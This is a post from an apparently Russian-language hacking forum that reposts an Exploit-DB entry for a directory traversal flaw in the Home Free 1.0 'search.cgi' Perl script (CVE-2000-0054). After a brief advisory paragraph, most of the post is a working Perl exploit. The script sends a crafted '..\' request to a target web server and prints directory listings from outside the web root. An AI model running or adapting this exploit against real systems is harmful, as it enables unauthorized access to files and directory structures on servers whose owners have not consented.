Exploit Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19713
Проверка EDB
  1. Пройдено
Автор
K0AD K1D
Тип уязвимости
REMOTE
Платформа
CGI
CVE
cve-2000-0054
Дата публикации
2000-01-03
Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal
Код:
source: https://www.securityfocus.com/bid/921/info

Home Free is a suite of Perl cgi scripts that allow a website to support user contributions of various types. One of the scripts, search.cgi, accepts a parameter called letter which can be any text string. The supplied argument can contain the '../' string, which the script will process. This can be used to obtain directory listings and the first line of files outside of the intended web filesystem.


#!/usr/bin/perl
#
# Quick exploit of the Home Free ./search.cgi script, allows you to list
# directories on the host.
#
#

use IO::Socket;

if ($ARGV[0] eq "") { die "no argument\n"; }

$asoc = IO::Socket::INET->new(Proto     => "tcp",
                              PeerAddr  => "target.host.net",
                              PeerPort  => 80) ||
                     die "can't connect to host: $!";

select($asoc);
$| = 1;

print $asoc "GET /cgi-bin/search.cgi?letter=..\\..\\..\\..\\$ARGV[0]&start=1&perpage=all HTTP/1.0\n\n";

while(<$asoc>) {
             if ($_ =~ /.+HREF.+TD.+/) {
                     @parts = split("\"", $_);
                     $foo = $parts[1];
                     @parts = split("/", $foo);
                     print STDOUT $parts[3];
                     print STDOUT "\n";
             }
     }
close(ASOC);
 
Источник
www.exploit-db.com

Похожие темы